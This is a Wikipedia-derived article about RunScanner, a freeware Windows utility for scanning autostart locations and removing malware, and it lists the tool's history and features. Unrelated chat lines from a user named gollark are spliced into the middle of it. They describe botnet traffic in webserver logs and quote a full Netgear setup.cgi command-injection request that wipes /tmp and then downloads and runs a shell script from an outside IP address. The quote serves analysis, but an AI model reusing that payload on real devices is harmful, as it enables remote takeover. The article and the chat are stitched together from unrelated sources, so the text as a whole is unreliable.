RunScanner

RunScanner is a freeware Microsoft Windows system utility that scans a Windows system for all configured running programs and autostart locations.

RunScanner
Developer(s): Geert Moernaut
Stable release: 2.0.0.60 / March 6, 2012
Operating system: Microsoft Windows
Type: Malware diagnostic & removal
License: Freeware
Website: http://www.runscanner.net

History

The program was created as a "best of both worlds" effort to combine all the positive features of similar programs such as HijackThis, Autoruns and Silentrunners. Unlike similar programs, RunScanner connects to an online database to rate the good and the bad items. The main purpose of the database is to do whitelisting[1] instead of blacklisting.

Usage

RunScanner scans all Windows autostart locations and lets the user delete misconfigured items and malware. Inexperienced users can post their log files to forums, where specialist helpers can help them solve their malware problems. Advanced users can use all features that modern malware fighters have come to expect.[2] Unlike other similar software, RunScanner can also exchange binary files with other users.

Main features

  • Scanning of 100+ hijack locations
  • Verification of file signatures
  • MD5 hash calculation of files
  • Online malware analysis of results
  • Extended filters
  • Item marking
  • Powerful process killer
  • Plain text logfile generation
  • Binary .run logfile generation
  • Hosts file editor
gollark: So now I'm actually wondering if this was a botnet programmed by edgy teenagers, or something.
gollark: I downloaded one of *those* to look at, and ran `strings` on it, and as well as what look like HTTP requests (presumably trying to exploit other devices), there are sets of strings like these:
gollark: I looked at the `.sh` file there, and it appears to just be trying to download and execute a bunch of binaries for different architectures.
gollark: So I was looking through my webserver logs, as you do, and I found a bunch of requests like this among the typical exploit-spam or whatever it is:
```
<> 91.80.163.224 [21/Aug/2020:00:10:44 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.95.168.247/Scylla.sh+-O+/tmp/Scylla.sh;sh+Scylla.sh&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 31 "-" "-"
```
gollark: Oh right, Australia.

References

  1. The rise of whitelisting
  2. Advanced Malware Cleaning (Mark Russinovich)

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.